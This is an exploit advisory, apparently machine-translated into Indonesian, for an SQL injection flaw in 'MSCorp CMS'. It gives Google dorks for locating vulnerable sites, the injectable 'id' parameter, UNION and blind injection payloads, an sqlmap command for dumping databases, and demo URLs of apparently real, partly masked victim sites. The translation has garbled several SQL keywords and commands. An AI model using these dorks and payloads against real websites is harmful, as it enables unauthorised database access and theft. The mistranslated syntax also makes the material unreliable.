Dork: "Dikembangkan Oleh MSCorp"
Oleh
chmood
[+] Judul: - MSCorp CMS - SQL Injection Vulnerability
[+] Tanggal: - 7 - Agustus - 2015
[+] Penjual Homepage: - http://www.mscorp.co.in/
[+] Versi: - Semua Versi
[+] Diuji pada: - Nginx / 1.4.5, PHP / 5.2.17, Linux - Jendela
[+] Kategori: - webapps
[+] Google Dorks: - "Dikembangkan Oleh MSCorp"
"Dikembangkan Dengan MSCorp" + inurl:.? Php / id =
"Dikembangkan Dengan MSCorp" inurl: "? Php"
[+] Exploit Penulis: - Shelesh Rauthan (ShOrTy420 alias @ Stian SEB)
[+] Nama Team: - Team Alastor Breeze, Cerdas-Eksploitasi
[+] Official Website: - serverfarming.com, intelligentexploit.com
[+] Para Anggota resmi: -!! Sh0rTy420, P @ rL0u $, nfIn Ty, Th3G0v3Rn3R, m777k
[+] Greedz ke: -@@lu, Lalit, MyLappy <3, Diksha, DK
[+] Kontak: - fb.com/shelesh.rauthan, [email protected], [email protected]
================================================== =======
[+] Severity Level: - Tinggi
[+] Request Cara (s): - GET / POST
[+] Parameter Rentan (s): - id
[+] Wilayah yang Terkena (s): - Seluruh admin, database, Server
[+] Tentang: - tidak berkepentingan SQL Injection melalui Beberapa Php Files menyebabkan kesalahan SQL
[+] SQL Berkas rentan: - /home/DOMAIN/public_html/XXX.php
[+] POC: - http://127.0.0.1/XXX.php?id=[SQL] '
Kerentanan web sql Injection dapat dimanfaatkan dengan remote
penyerang tanpa hak istimewa web-aplikasi pengguna akun atau pengguna
interaksi.
. http: // www [WEBSITE] .com / XXX.php id = 6 rangka 'berdasarkan [SQL IN4JECTION] - +
. http: // www [WEBSITE] .com / XXX.php id = 6 union 'semua pilih [SQL INJECTION] - +
SqlMap
++++++++++++++++++++++++++
python sqlmap.py -url "http://127.0.0.1/XXX.php?id=[SQL]" -dbs
++++++++++++++++++++++++++
-
Parameter: id (GET)
Jenis: buta berbasis boolean
Judul: DAN boolean berbasis buta - MANA atau klausa HAVING
Payload: id = 6 AND 1803 = 1803
Jenis: DAN / ATAU waktu berbasis buta
Judul: MySQL> = 5.0.12 DAN waktu berbasis buta
Payload: id = 6 DAN TIDUR (5)
Jenis: permintaan UNION
Judul: permintaan UNION Generic (NULL) - 1 kolom
Payload: id = 6 UNION ALL SELECT CONCAT (0x717a626a71,0x72454556666e64596a4a, 0x7178767071) -
-
[+] DEMO: - http://www.hoXtelsahyadrialibaug.com/gallery.php?id=6 '
http://www.tapolaXtourism.com/showContent.php?id=17 '
http://www.reigeXltech.com/content.php?content=10 '
http://www.koyXanalakeview.com/facilities.php?content=4 '
Category
Komentar